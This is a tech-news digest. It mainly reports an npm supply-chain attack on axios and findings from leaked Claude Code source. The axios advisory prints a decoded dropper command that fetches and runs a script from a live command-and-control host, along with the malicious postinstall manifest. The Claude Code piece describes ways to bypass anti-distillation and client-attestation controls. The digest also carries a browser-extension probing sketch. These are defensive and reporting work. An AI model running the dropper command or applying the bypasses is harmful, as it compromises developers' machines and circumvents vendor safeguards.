10 interesting stories served every morning and every evening.




1 1,792 shares, 60 trendiness

LinkedIn Is Illegally Searching Your Computer

Every time any of LinkedIn's one billion users visits linkedin.com, hidden code searches their computer for installed software, collects the results, and transmits them to LinkedIn's servers and to third-party companies, including an American-Israeli cybersecurity firm.

The user is never asked. Never told. LinkedIn's privacy policy does not mention it.

Because LinkedIn knows each user's real name, employer, and job title, it is not searching anonymous visitors. It is searching identified people at identified companies. Millions of companies. Every day. All over the world.

Fairlinked e.V. is an association of commercial LinkedIn users. We represent the professionals who use LinkedIn, the businesses that invest in and depend on the platform, and the toolmakers who build products for it.

BrowserGate is our investigation and campaign to document one of the largest corporate espionage and data breach scandals in digital history, to inform the public and regulators, to collect evidence, and to raise funds for the legal proceedings required to stop it.

LinkedIn's scan reveals the religious beliefs, political opinions, disabilities, and job search activity of identified individuals. LinkedIn scans for extensions that identify practicing Muslims, extensions that reveal political orientation, extensions built for neurodivergent users, and 509 job search tools that expose who is secretly looking for work on the very platform where their current employer can see their profile.

Under EU law, this category of data is not merely regulated. It is prohibited. LinkedIn has no consent, no disclosure, and no legal basis. Its privacy policy does not mention any of this.

LinkedIn scans for over 200 products that directly compete with its own sales tools, including Apollo, Lusha, and ZoomInfo. Because LinkedIn knows each user's employer, it can map which companies use which competitor products. It is extracting the customer lists of thousands of software companies from their users' browsers without anyone's knowledge.

Then it uses what it finds. LinkedIn has already sent enforcement threats to users of third-party tools, using data obtained through this covert scanning to identify its targets.

In 2023, the EU designated LinkedIn as a regulated gatekeeper under the Digital Markets Act and ordered it to open its platform to third-party tools. LinkedIn's response:

It published two restricted APIs and presented them to the European Commission as compliance. Together, these APIs handle approximately 0.07 calls per second. Meanwhile, LinkedIn already operates an internal API called Voyager that powers every LinkedIn web and mobile product at 163,000 calls per second. In Microsoft's 249-page compliance report to the EU, the word "API" appears 533 times. "Voyager" appears zero times.

At the same time, LinkedIn expanded its surveillance of the exact tools the regulation was designed to protect. The scan list grew from roughly 461 products in 2024 to over 6,000 by February 2026. The EU told LinkedIn to let third-party tools in. LinkedIn built a surveillance system to find and punish every user of those tools.

LinkedIn loads an invisible tracking element from HUMAN Security (formerly PerimeterX), an American-Israeli cybersecurity firm, zero pixels wide, hidden off-screen, that sets cookies on your browser without your knowledge. A separate fingerprinting script runs from LinkedIn's own servers. A third script from Google executes silently on every page load. All of it encrypted. None of it disclosed.
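Extension scanning of this kind is typically done by probing for resources that installed extensions expose to web pages. The following is a minimal sketch of that general technique, not LinkedIn's actual code; the helper names and the example resource path are hypothetical:

```javascript
// General extension-detection technique (sketch): Chromium extensions that
// declare "web_accessible_resources" can be detected by attempting to load
// a known resource URL. A successful load means the extension is installed.

// Pure helper: build the probe URL for an extension ID and resource path.
function probeUrl(extensionId, resourcePath) {
  return `chrome-extension://${extensionId}/${resourcePath}`;
}

// Browser-side probe: resolves true if the resource loads (extension present).
function probeExtension(extensionId, resourcePath) {
  return new Promise((resolve) => {
    const img = new Image();
    img.onload = () => resolve(true);   // resource exists, so extension is installed
    img.onerror = () => resolve(false); // blocked or missing, so not detected
    img.src = probeUrl(extensionId, resourcePath);
  });
}
```

Run against a list of thousands of known extension IDs, a probe like this yields exactly the kind of per-visitor software inventory the article describes.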

Microsoft has 33,000 employees and a $15 billion legal budget. We have the evidence. What we need is people and funding to hold them accountable.

...

Read the original on browsergate.eu »

2 1,783 shares, 73 trendiness

Malicious axios Versions Drop Remote Access Trojan

Hijacked maintainer account used to publish poisoned axios releases including 1.14.1 and 0.30.4. The attacker injected a hidden dependency that drops a cross-platform RAT. We are actively investigating and will update this post with a full technical analysis.

StepSecurity hosted a community town hall on this incident on April 1st at 10:00 AM PT. YouTube recording: https://youtu.be/3Hku_svFvos

axios is the most popular JavaScript HTTP client library, with over 100 million weekly downloads. On March 30, 2026, StepSecurity identified two malicious versions of the widely used axios HTTP client library published to npm: axios@1.14.1 and axios@0.30.4. The malicious versions inject a new dependency, plain-crypto-js@4.2.1, which is never imported anywhere in the axios source code. Its sole purpose is to execute a postinstall script that acts as a cross-platform remote access trojan (RAT) dropper, targeting macOS, Windows, and Linux. The dropper contacts a live command-and-control server and delivers platform-specific second-stage payloads. After execution, the malware deletes itself and replaces its own package.json with a clean version to evade forensic detection.

If you have installed axios@1.14.1 or axios@0.30.4, assume your system is compromised.

There are zero lines of malicious code inside axios itself, and that's exactly what makes this attack so dangerous. Both poisoned releases inject a fake dependency, plain-crypto-js@4.2.1, a package never imported anywhere in the axios source, whose sole purpose is to run a postinstall script that deploys a cross-platform remote access trojan. The dropper contacts a live command-and-control server, delivers separate second-stage payloads for macOS, Windows, and Linux, then erases itself and replaces its own package.json with a clean decoy.

A developer who inspects their node_modules folder after the fact will find no indication anything went wrong.

This was not opportunistic. It was precision. The malicious dependency was staged 18 hours in advance. Three payloads were pre-built for three operating systems. Both release branches were poisoned within 39 minutes of each other. Every artifact was designed to self-destruct. Within two seconds of npm install, the malware was already calling home to the attacker's server, before npm had even finished resolving dependencies. This is among the most operationally sophisticated supply chain attacks ever documented against a top-10 npm package.

These compromises were detected by StepSecurity AI Package Analyst [1][2] and StepSecurity Harden-Runner. We have responsibly disclosed the issue to the project maintainers.

StepSecurity Harden-Runner, whose community tier is free for public repos and is used by over 12,000 public repositories, detected the compromised axios package making anomalous outbound connections to the attacker's C2 domain across multiple open source projects. For example, Harden-Runner flagged the C2 callback to sfrclak.com:8000 during a routine CI run in the backstage repository, one of the most widely used developer portal frameworks. The Backstage team has confirmed that this workflow is intentionally sandboxed and that the malicious package install does not impact the project. The connection was automatically marked as anomalous because it had never appeared in any prior workflow run. Harden-Runner insights for community-tier projects are public by design, allowing anyone to verify the detection: https://app.stepsecurity.io/github/backstage/backstage/actions/runs/23775668703?tab=network-events

[Community Webinar] axios Compromised on npm: What We Know, What You Should Do

Watch the StepSecurity community briefing on the axios supply chain attack. We walk through the full attack chain, indicators of compromise, and remediation steps, and answer community questions.

Watch the recording on YouTube →

The attack was pre-staged across roughly 18 hours, with the malicious dependency seeded on npm before the axios releases to avoid "brand-new package" alarms from security scanners:

plain-crypto-js@4.2.0, published by nrwise@proton.me — a clean decoy containing a full copy of the legitimate crypto-js source, with no postinstall hook. Its sole purpose is to establish npm publishing history so the package does not appear as a zero-history account during later inspection.

plain-crypto-js@4.2.1, published by nrwise@proton.me — malicious payload added. The "postinstall": "node setup.js" hook and obfuscated dropper are introduced.

axios@1.14.1, published by the compromised jasonsaayman account (email: ifstap@proton.me) — injects plain-crypto-js@4.2.1 as a runtime dependency, targeting the modern 1.x user base.

axios@0.30.4, published by the same compromised account — identical injection into the legacy 0.x branch, published 39 minutes later to maximize coverage across both release lines.
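Because the entire payload hangs off an install-time hook, one generic defense is auditing every dependency's manifest for install scripts before running npm install. A minimal sketch (the findInstallScripts helper is hypothetical, not a StepSecurity tool):

```javascript
// Flag install-time lifecycle hooks in a dependency's package.json.
// npm runs these automatically on install — the mechanism this attack abuses.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

function findInstallScripts(pkgJson) {
  const scripts = pkgJson.scripts || {};
  return INSTALL_HOOKS.filter((hook) => hook in scripts).map(
    (hook) => `${pkgJson.name}@${pkgJson.version}: ${hook} -> ${scripts[hook]}`
  );
}
```

Applied to the malicious plain-crypto-js manifest, this surfaces the single line that matters: its postinstall hook. (npm also supports --ignore-scripts to disable lifecycle scripts outright.)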

npm unpublishes axios@1.14.1 and axios@0.30.4. Both versions are removed from the registry and the latest dist-tag reverts to 1.14.0. axios@1.14.1 had been live for approximately 2 hours 53 minutes; axios@0.30.4 for approximately 2 hours 15 minutes. The timestamp is inferred from the axios registry document's modified field (03:15:30Z) — npm does not expose a dedicated per-version unpublish timestamp in its public API.

npm initiates a security hold on plain-crypto-js, beginning the process of replacing the malicious package with an npm security-holder stub.

npm publishes the security-holder stub plain-crypto-js@0.0.1-security.0 under the npm@npmjs.com account, formally replacing the malicious package on the registry. plain-crypto-js@4.2.1 had been live for approximately 4 hours 27 minutes. Attempting to install any version of plain-crypto-js now returns the security notice.
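To check whether a project ever resolved the bad versions, the lockfile is more reliable than node_modules (which the dropper cleans up). A minimal sketch against the npm v2/v3 package-lock.json format (the findBadPackages helper is hypothetical):

```javascript
// Scan a parsed package-lock.json (lockfileVersion 2/3, which stores a
// top-level "packages" map) for the versions published during this incident.
const BAD_VERSIONS = new Set([
  "axios@1.14.1",
  "axios@0.30.4",
  "plain-crypto-js@4.2.1",
]);

function findBadPackages(lock) {
  const hits = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (!path) continue; // the "" entry is the root project itself
    // "node_modules/foo" or "node_modules/foo/node_modules/bar" -> package name
    const name = path.slice(path.lastIndexOf("node_modules/") + "node_modules/".length);
    const id = `${name}@${meta.version}`;
    if (BAD_VERSIONS.has(id)) hits.push(id);
  }
  return hits;
}
```

Any hit means the postinstall hook ran at install time and the host should be treated as compromised.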

The attacker compromised the jasonsaayman npm account, the primary maintainer of the axios project. The account's registered email was changed to ifstap@proton.me — an attacker-controlled ProtonMail address. Using this access, the attacker published malicious builds across both the 1.x and 0.x release branches simultaneously, maximizing the number of projects exposed.

Both axios@1.14.1 and axios@0.30.4 are recorded in the npm registry as published by jasonsaayman, making them indistinguishable from legitimate releases at a glance. Both versions were published using the compromised npm credentials of a lead axios maintainer, bypassing the project's normal GitHub Actions CI/CD pipeline.

A critical forensic signal is visible in the npm registry metadata. Every legitimate axios 1.x release is published via GitHub Actions with npm's OIDC Trusted Publisher mechanism, meaning the publish is cryptographically tied to a verified GitHub Actions workflow. axios@1.14.1 breaks that pattern entirely — published manually via a stolen npm access token, with no OIDC binding and no gitHead:

// axios@1.14.0 — LEGITIMATE

"_npmUser": {
  "name": "GitHub Actions",
  "email": "npm-oidc-no-reply@github.com",
  "trustedPublisher": {
    "id": "github",
    "oidcConfigId": "oidc:9061ef30-3132-49f4-b28c-9338d192a1a9"
  }
}

// axios@1.14.1 — MALICIOUS
"_npmUser": {
  "name": "jasonsaayman",
  "email": "ifstap@proton.me"
  // no trustedPublisher, no gitHead, no corresponding GitHub commit or tag

}

There is no commit or tag in the axios GitHub repository that corresponds to 1.14.1. The release exists only on npm. The OIDC token that legitimate releases use is ephemeral and scoped to the specific workflow — it cannot be stolen. The attacker must have obtained a long-lived classic npm access token for the account.

Before publishing the malicious axios versions, the attacker pre-staged plain-crypto-js@4.2.1 from the account nrwise@proton.me. This package:

Masquerades as crypto-js, with an identical description and a repository URL pointing to the legitimate brix/crypto-js GitHub repository

Contains "postinstall": "node setup.js" — the hook that fires the RAT dropper on install

Pre-stages a clean package.json stub in a file named package.md for evidence destruction after execution

The decoy version (4.2.0) was published 18 hours earlier to establish publishing history — a clean package in the registry that makes nrwise look like a legitimate maintainer.

What changed between 4.2.0 (decoy) and 4.2.1 (malicious)

A complete file-level comparison between plain-crypto-js@4.2.0 and plain-crypto-js@4.2.1 reveals exactly three differences. Every other file (all 56 crypto source files, the README, the LICENSE, and the docs) is identical between the two versions:

The 56 crypto source files are not just similar; they are bit-for-bit identical to the corresponding files in the legitimate crypto-js@4.2.0 package published by Evan Vosberg. The attacker made no modifications to the cryptographic library code whatsoever. This was intentional: any diff-based analysis comparing plain-crypto-js against crypto-js would find nothing suspicious in the library files and would focus attention on package.json — where the postinstall hook looks, at a glance, like a standard build or setup task.

The anti-forensics stub (package.md) deserves particular attention. After setup.js runs, it renames package.md to package.json. The stub reports version 4.2.0 — not 4.2.1:

// Contents of package.md (the clean replacement stub)

{
  "name": "plain-crypto-js",
  "version": "4.2.0",   // ← reports 4.2.0, not 4.2.1 — deliberate mismatch
  "description": "JavaScript library of crypto standards.",
  "license": "MIT",
  "author": { "name": "Evan Vosberg", "url": "http://github.com/evanvosberg" },
  "homepage": "http://github.com/brix/crypto-js",
  "repository": { "type": "git", "url": "http://github.com/brix/crypto-js.git" },
  "main": "index.js",
  // No "scripts" key — no postinstall, no test
  "dependencies": {}

}

This creates a secondary deception layer. After infection, running npm list in the project directory will report plain-crypto-js@4.2.0 — because npm list reads the version field from the installed package.json, which now says 4.2.0. An incident responder checking installed packages would see a version number that does not match the malicious 4.2.1 version they were told to look for, potentially leading them to conclude the system was not compromised.

# What npm list reports POST-infection (after the package.json swap):

$ npm list plain-crypto-js
myproject@1.0.0
└── plain-crypto-js@4.2.0   # ← reports 4.2.0, not 4.2.1
                            #   but the dropper already ran as 4.2.1

# The reliable check is the DIRECTORY PRESENCE, not the version number:
$ ls node_modules/plain-crypto-js
aes.js cipher-core.js core.js …

# If this directory exists at all, the dropper ran.

# plain-crypto-js is not a dependency of ANY legitimate axios version.

The difference between the real crypto-js@4.2.0 and the malicious plain-crypto-js@4.2.1 is a single field in package.json:

// crypto-js@4.2.0 (LEGITIMATE — Evan Vosberg / brix)

{
  "name": "crypto-js",
  "version": "4.2.0",
  "description": "JavaScript library of crypto standards.",
  "author": "Evan Vosberg",
  "homepage": "http://github.com/brix/crypto-js",
  "scripts": {
    "test": "grunt"   // ← no postinstall
  }
}

// plain-crypto-js@4.2.1 (MALICIOUS — nrwise@proton.me)
{
  "name": "plain-crypto-js",        // ← different name, everything else cloned
  "version": "4.2.1",               // ← version one ahead of the real package
  "description": "JavaScript library of crypto standards.",
  "author": { "name": "Evan Vosberg" },            // ← fraudulent use of real author name
  "homepage": "http://github.com/brix/crypto-js",  // ← real repo, wrong package
  "scripts": {
    "test": "grunt",
    "postinstall": "node setup.js"  // ← THE ONLY DIFFERENCE. The entire weapon.
  }

}

The attacker published axios@1.14.1 and axios@0.30.4 with "plain-crypto-js": "^4.2.1" added as a runtime dependency — a package that has never appeared in any legitimate axios release. The diff is surgical: every other dependency is identical to the prior clean version.

When a developer runs npm install axios@1.14.1, npm resolves the dependency tree and installs plain-crypto-js@4.2.1 automatically. npm then executes plain-crypto-js's postinstall script, launching the dropper.

Phantom dependency: a grep across all 86 files in axios@1.14.1 confirms that plain-crypto-js is never imported or require()'d anywhere in the axios source code. It is added to package.json only to trigger the postinstall hook. A dependency that appears in the manifest but has zero usage in the codebase is a high-confidence indicator of a compromised release.

The Surgical Precision of the Injection

A complete binary diff between axios@1.14.0 and axios@1.14.1 across all 86 files (excluding source maps) reveals that exactly one file changed: package.json. Every other file — all 85 library source files, type definitions, README, CHANGELOG, and compiled dist bundles — is bit-for-bit identical between the two versions.

# File diff: axios@1.14.0 vs axios@1.14.1 (86 files, source maps excluded)

DIFFERS: package.json
Total differing files: 1
Files only in 1.14.1: (none)
Files only in 1.14.0: (none)

# --- axios/package.json (1.14.0)
# +++ axios/package.json (1.14.1)
-   "version": "1.14.0",
+   "version": "1.14.1",
    "scripts": {
      "fix": "eslint --fix lib/**/*.js",
-     "prepare": "husky"
    "dependencies": {
      "follow-redirects": "^2.1.0",
      "form-data": "^4.0.1",
      "proxy-from-env": "^2.1.0",
+     "plain-crypto-js": "^4.2.1"

}

Two changes are visible: the version bump (1.14.0 → 1.14.1) and the addition of plain-crypto-js. There is also a third, less obvious change: the "prepare": "husky" script was removed. husky is the git hook manager used by the axios project to enforce pre-commit checks. Its removal from the scripts section is consistent with a manual publish that bypassed the normal development workflow — the attacker edited package.json directly without going through the project's standard release tooling, which would have re-added the husky prepare script.

The same analysis applies to axios@0.30.3 → axios@0.30.4:

# --- axios/package.json (0.30.3)

# +++ axios/package.json (0.30.4)
-   "version": "0.30.3",
+   "version": "0.30.4",
    "dependencies": {
      "follow-redirects": "^1.15.4",
      "form-data": "^4.0.4",
      "proxy-from-env": "^1.1.0",
+     "plain-crypto-js": "^4.2.1"

}

Again — exactly one substantive change: the malicious dependency injection. The version bump itself (from 0.30.3 to 0.30.4) is simply the required npm version increment to publish a new release; it carries no functional significance.

setup.js is a single minified file employing a two-layer obfuscation scheme designed to evade static analysis tools and confuse human reviewers. All sensitive strings — module names, OS identifiers, shell commands, the C2 URL, and file paths — are stored as encoded values in an array named stq[]. Two functions decode them at runtime:

_trans_1(x, r) — XOR cipher. The key "OrDeR_7077" is parsed through JavaScript's Number(): alphabetic characters produce NaN, which in bitwise operations becomes 0. Only the digits 7, 0, 7, 7 in positions 6–9 survive, giving an effective key of [0,0,0,0,0,0,7,0,7,7]. Each character at position r is decoded as:

charCode XOR key[(7 × r × r) % 10] XOR 333

_trans_2(x, r) — Outer layer. Reverses the encoded string, replaces _ with =, base64-decodes the result (interpreting the bytes as UTF-8 to recover Unicode code points), then passes the output through _trans_1.

The dropper's entry point is _entry("6202033"), where 6202033 is the C2 URL path segment. The full C2 URL is: http://sfrclak.com:8000/6202033

StepSecurity fully decoded every entry in the stq[] array. The recovered plaintext reveals the complete attack:

stq[0]  → "child_process"           // shell execution

stq[1]  → "os"                      // platform detection
stq[2]  → "fs"                      // filesystem operations
stq[3]  → "http://sfrclak.com:8000/"  // C2 base URL
stq[5]  → "win32"                   // Windows platform identifier
stq[6]  → "darwin"                  // macOS platform identifier
stq[12] → "curl -o /tmp/ld.py -d packages.npm.org/product2 -s SCR_LINK && nohup python3 /tmp/ld.py SCR_LINK > /dev/null 2>&1 &"
stq[13] → "package.json"            // deleted after execution
stq[14] → "package.md"              // clean stub renamed to package.json
stq[15] → ".exe"
stq[16] → ".ps1"

stq[17] → ".vbs"

The complete attack path runs from npm install to C2 contact and cleanup, across all three target platforms. With all strings decoded, the dropper's full logic can be reconstructed and annotated. The following is a de-obfuscated, commented version of the _entry() function that constitutes the entire dropper payload. Original variable names are preserved; comments are added for clarity.

// setup.js — de-obfuscated and annotated

// SHA-256: e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09

...
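The two-layer decode described above can be reproduced from the description alone. A runnable sketch (function names and the key follow the leaked dropper; the encoded stq[] payloads themselves are not reproduced here):

```javascript
// _trans_1: XOR layer. Number("O") is NaN, and NaN | 0 is 0, so the key
// "OrDeR_7077" collapses to [0,0,0,0,0,0,7,0,7,7] exactly as described.
const KEY = "OrDeR_7077".split("").map((c) => Number(c) | 0);

function trans1(s) {
  let out = "";
  for (let r = 0; r < s.length; r++) {
    out += String.fromCharCode(s.charCodeAt(r) ^ KEY[(7 * r * r) % 10] ^ 333);
  }
  return out;
}

// _trans_2: outer layer — reverse the string, restore base64 padding
// ("_" back to "="), decode the bytes as UTF-8, then run the XOR layer.
function trans2(s) {
  const b64 = s.split("").reverse().join("").replace(/_/g, "=");
  return trans1(Buffer.from(b64, "base64").toString("utf8"));
}
```

Because each position is XORed with a fixed value, trans1 is its own inverse — applying it twice returns the input — which makes the scheme trivial to reverse once the key derivation is understood.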

Read the original on www.stepsecurity.io »

3 1,659 shares, 57 trendiness

Gemma 4

Our most intelligent open models, built from Gemini 3 research and technology to maximize intelligence-per-parameter


Build autonomous agents that plan, navigate apps, and complete tasks on your behalf, with native support for function calling. Develop applications with strong audio and visual understanding, for rich multimodal support. Create multilingual experiences that go beyond translation and understand cultural context. Improve performance for specific tasks by training Gemma using your preferred frameworks and techniques. Run models on your own hardware for efficient development and deployment.

A new level of intelligence for mobile and IoT devices: audio and vision support for real-time edge processing. These models can run completely offline with near-zero latency on edge devices like phones, Raspberry Pi, and Jetson Nano.

Advanced reasoning for IDEs, coding assistants, and agentic workflows. These models are optimized for consumer GPUs — giving students, researchers, and developers the ability to turn workstations into local-first AI servers.

Gemma 4 models undergo the same rigorous infrastructure security protocols as our proprietary models. By choosing Gemma 4, enterprises and sovereign organizations gain a trusted, transparent foundation that delivers state-of-the-art capabilities while meeting the highest standards for security and reliability.

...

Read the original on deepmind.google »

4 1,482 shares, 58 trendiness

copilot edited an ad into my pr

After a team member summoned Copilot to correct a typo in a PR of mine, Copilot edited my PR description to include an ad for itself and Raycast.

This is horrific. I knew this kind of bullshit would happen eventually, but I didn't expect it so soon.

Here is how platforms die: first, they are good to their users; then they abuse their users to make things better for their business customers; finally, they abuse those business customers to claw back all the value for themselves. Then, they die.

...

Read the original on notes.zachmanson.com »

5 1,318 shares, 54 trendiness

fake tools, frustration regexes, undercover mode, and more

Update: see HN discussions about this post: https://news.ycombinator.com/item?id=47586778

I use Claude Code daily, so when Chaofan Shou noticed earlier today that Anthropic had shipped a .map file alongside their Claude Code npm package, one containing the full, readable source code of the CLI tool, I immediately wanted to look inside. The package has since been pulled, but not before the code was widely mirrored (including by me) and picked apart on Hacker News.

This is Anthropic's second accidental exposure in a week (the model spec leak was just days ago), and some people on Twitter are starting to wonder if someone inside is doing this on purpose. Probably not, but it's a bad look either way. The timing is hard to ignore: just ten days ago, Anthropic sent legal threats to OpenCode, forcing them to remove built-in Claude authentication because third-party tools were using Claude Code's internal APIs to access Opus at subscription rates instead of pay-per-token pricing. That whole saga makes some of the findings below more pointed.

So I spent my morning reading through the HN comments and leaked source. Here's what I found, roughly ordered by how "spicy" I thought it was.

In claude.ts (lines 301-313), there's a flag called ANTI_DISTILLATION_CC. When enabled, Claude Code sends anti_distillation: ['fake_tools'] in its API requests. This tells the server to silently inject decoy tool definitions into the system prompt.

The idea: if someone is recording Claude Code's API traffic to train a competing model, the fake tools pollute that training data. It's gated behind a GrowthBook feature flag (tengu_anti_distill_fake_tool_injection) and only active for first-party CLI sessions.

This was one of the first things people noticed on HN.

There's also a second anti-distillation mechanism in betas.ts (lines 279-298): server-side connector-text summarization. When enabled, the API buffers the assistant's text between tool calls, summarizes it, and returns the summary with a cryptographic signature. On subsequent turns, the original text can be restored from the signature. If you're recording API traffic, you only get the summaries, not the full reasoning chain.

How hard would it be to work around these? Not very. Looking at the activation logic in claude.ts, the fake-tools injection requires all four conditions to be true: the ANTI_DISTILLATION_CC compile-time flag, the cli entrypoint, a first-party API provider, and the tengu_anti_distill_fake_tool_injection GrowthBook flag returning true. A MITM proxy that strips the anti_distillation field from request bodies before they reach the API would bypass it entirely, since the injection is server-side and opt-in. The shouldIncludeFirstPartyOnlyBetas() function also checks for CLAUDE_CODE_DISABLE_EXPERIMENTAL_BETAS, so setting that env var to a truthy value disables the whole thing. And if you're using a third-party API provider or the SDK entrypoint instead of the CLI, the check never fires at all. The connector-text summarization is even more narrowly scoped, Anthropic-internal-only (USER_TYPE === 'ant'), so external users won't encounter it regardless.

Anyone serious about distilling from Claude Code traffic would find the workarounds in about an hour of reading the source. The real protection is probably legal, not technical.

The file undercover.ts (about 90 lines) implements a mode that strips all traces of Anthropic internals when Claude Code is used in non-internal repos. It instructs the model to never mention internal codenames like "Capybara" or "Tengu," internal Slack channels, repo names, or the phrase "Claude Code" itself.

"There is NO force-OFF. This guards against model codename leaks."

You can force it ON with CLAUDE_CODE_UNDERCOVER=1, but there's no way to force it off. In external builds, the entire function gets dead-code-eliminated to trivial returns. This is a one-way door.

This means AI-authored commits and PRs from Anthropic employees in open source projects will have no indication that an AI wrote them. Hiding internal codenames is reasonable. Having the AI actively pretend to be human is a different thing.

An LLM company using regexes for sentiment analysis is peak irony, but also: a regex is faster and cheaper than an LLM inference call just to check if someone is swearing at your tool.
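The tradeoff is easy to see in a sketch — a regex pass costs microseconds while an inference call costs real money and latency. The patterns below are illustrative only, not the ones in the leaked source:

```javascript
// Illustrative frustration detector: cheap regexes instead of an LLM call.
const FRUSTRATION_PATTERNS = [
  /\b(wtf|ffs|dammit)\b/i,
  /this is (stupid|useless|broken)/i,
  /\byou('re| are) not listening\b/i,
];

function looksFrustrated(message) {
  return FRUSTRATION_PATTERNS.some((re) => re.test(message));
}
```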

In system.ts (lines 59-95), API requests include a cch=00000 placeholder. Before the request leaves the process, Bun's native HTTP stack (written in Zig) overwrites those five zeros with a computed hash. The server then validates the hash to confirm the request came from a real Claude Code binary, not a spoofed one.

They use a placeholder of the same length so the replacement doesn't change the Content-Length header or require buffer reallocation. The computation happens below the JavaScript runtime, so it's invisible to anything running in the JS layer. It's basically DRM for API calls, implemented at the HTTP transport level.
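The same-length trick is worth spelling out: because the stamp occupies exactly the bytes the placeholder did, the serialized request never changes size, so a Content-Length computed over the original body stays valid. A JS-level sketch of the idea (the real replacement happens in native Zig code below the runtime; stampAttestation and the 5-byte format are assumptions for illustration):

```javascript
// Overwrite the 5-byte placeholder in place. Same length in means same
// length out, so the precomputed Content-Length header stays correct.
function stampAttestation(body, hash5) {
  if (hash5.length !== 5) throw new Error("stamp must be exactly 5 bytes");
  return body.replace("cch=00000", `cch=${hash5}`);
}
```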

This is the technical enforcement behind the OpenCode legal fight. Anthropic doesn't just ask third-party tools not to use their APIs; the binary itself cryptographically proves it's the real Claude Code client. If you're wondering why the OpenCode community had to resort to session-stitching hacks and auth plugins after Anthropic's legal notice, this is why.

The attestation isn't airtight, though. The whole mechanism is gated behind a compile-time feature flag (NATIVE_CLIENT_ATTESTATION), and the cch=00000 placeholder only gets injected into the x-anthropic-billing-header when that flag is on. The header itself can be disabled entirely by setting CLAUDE_CODE_ATTRIBUTION_HEADER to a falsy value, or remotely via a GrowthBook killswitch (tengu_attribution_header). The Zig-level hash replacement also only works inside the official Bun binary. If you rebuilt the JS bundle and ran it on stock Bun (or Node), the placeholder would survive as-is: five literal zeros hitting the server. Whether the server rejects that outright or just logs it is an open question, but the code comment references a server-side _parse_cc_header function that "tolerates unknown extra fields," which suggests the validation might be more forgiving than you'd expect for a DRM-like system. Not a push-button bypass, but not the kind of thing that would stop a determined third-party client for long either.

"BQ 2026-03-10: 1,279 sessions had 50+ consecutive failures (up to 3,272) in a single session, wasting ~250K API calls/day globally."

The fix? MAX_CONSECUTIVE_AUTOCOMPACT_FAILURES = 3. After 3 consecutive failures, compaction is disabled for the rest of the session. Three lines of code to stop burning a quarter million API calls a day.
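The described fix is a classic circuit breaker. A sketch of the shape (the constant name mirrors the leak; makeCompactionGuard is a hypothetical wrapper, not the actual code):

```javascript
// Circuit breaker: after 3 consecutive compaction failures, stop trying
// for the rest of the session instead of burning API calls on retries.
const MAX_CONSECUTIVE_AUTOCOMPACT_FAILURES = 3;

function makeCompactionGuard() {
  let consecutiveFailures = 0;
  let disabled = false;
  return {
    canCompact: () => !disabled,
    recordResult(succeeded) {
      if (succeeded) {
        consecutiveFailures = 0; // any success resets the counter
        return;
      }
      if (++consecutiveFailures >= MAX_CONSECUTIVE_AUTOCOMPACT_FAILURES) {
        disabled = true; // latched off for the remainder of the session
      }
    },
  };
}
```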

Throughout the codebase, there are references to a feature-gated mode called KAIROS. Based on the code paths in main.tsx, it looks like an unreleased autonomous agent mode that includes:

This is probably the biggest product roadmap reveal from the leak.

The implementation is heavily gated, so who knows how far along it is. But the scaffolding for an always-on, background-running agent is there.

Tomorrow is April 1st, and the source con­tains what’s al­most cer­tainly this year’s April Fools’ joke: buddy/​com­pan­ion.ts im­ple­ments a Tamagotchi-style com­pan­ion sys­tem. Every user gets a de­ter­min­is­tic crea­ture (18 species, rar­ity tiers from com­mon to leg­endary, 1% shiny chance, RPG stats like DEBUGGING and SNARK) gen­er­ated from their user ID via a Mulberry32 PRNG. Species names are en­coded with String.fromCharCode() to dodge build-sys­tem grep checks.
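Mulberry32 is a well-known public-domain 32-bit PRNG, so the deterministic-creature scheme is easy to reconstruct in outline. The seeding-from-user-ID step and the species names below are my assumptions, not the real table in buddy/companion.ts.

```typescript
// Standard Mulberry32 PRNG: a tiny seeded generator returning floats in [0, 1).
function mulberry32(seed: number): () => number {
  let a = seed >>> 0;
  return () => {
    a = (a + 0x6d2b79f5) >>> 0;
    let t = a;
    t = Math.imul(t ^ (t >>> 15), t | 1);
    t ^= t + Math.imul(t ^ (t >>> 7), t | 61);
    return ((t ^ (t >>> 14)) >>> 0) / 4294967296;
  };
}

// FNV-1a: collapse an arbitrary user-ID string into a 32-bit seed (assumed step).
function hashUserId(id: string): number {
  let h = 0x811c9dc5;
  for (const ch of id) {
    h ^= ch.charCodeAt(0);
    h = Math.imul(h, 0x01000193);
  }
  return h >>> 0;
}

const SPECIES = ["Bugbyte", "Stackaroo", "Nullfin"]; // hypothetical names

function companionFor(userId: string): { species: string; shiny: boolean } {
  const rand = mulberry32(hashUserId(userId));
  return {
    species: SPECIES[Math.floor(rand() * SPECIES.length)],
    shiny: rand() < 0.01, // the 1% shiny roll mentioned in the source
  };
}
```

Because the seed is derived from the user ID, every user gets the same creature on every run with no server-side state.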

The terminal rendering in ink/screen.ts and ink/optimizer.ts borrows game-engine techniques: an Int32Array-backed ASCII char pool, bitmask-encoded style metadata, a patch optimizer that merges cursor moves and cancels hide/show pairs, and a self-evicting line-width cache (the source claims a “~50x reduction in stringWidth calls during token streaming”). Seems like overkill until you remember these things stream tokens one at a time.
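A self-evicting width cache can be sketched in a few lines. Everything here is an assumption about the semantics, not the leaked implementation: memoize width per line, cap the entry count, and evict in insertion order when full (the stand-in stringWidth ignores wide characters and ANSI codes that a real one must handle).

```typescript
// Stand-in width function; real ones account for wide chars and ANSI escapes.
function stringWidth(s: string): number {
  return s.length;
}

class WidthCache {
  private cache = new Map<string, number>();
  constructor(private maxEntries = 1024) {}

  width(line: string): number {
    const hit = this.cache.get(line);
    if (hit !== undefined) return hit; // repeated lines skip recomputation
    const w = stringWidth(line);
    if (this.cache.size >= this.maxEntries) {
      // Self-evict: drop the oldest entry (Map preserves insertion order).
      const oldest = this.cache.keys().next().value;
      if (oldest !== undefined) this.cache.delete(oldest);
    }
    this.cache.set(line, w);
    return w;
  }
}
```

During token streaming the same prefix lines are re-measured on every frame, which is where a bounded memo like this earns its keep.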

Every bash com­mand runs through 23 num­bered se­cu­rity checks in bash­Se­cu­rity.ts: 18 blocked Zsh builtins, de­fense against Zsh equals ex­pan­sion (=curl by­pass­ing per­mis­sion checks for curl), uni­code zero-width space in­jec­tion, IFS null-byte in­jec­tion, and a mal­formed to­ken by­pass found dur­ing HackerOne re­view. I haven’t seen an­other tool with this spe­cific a Zsh threat model.
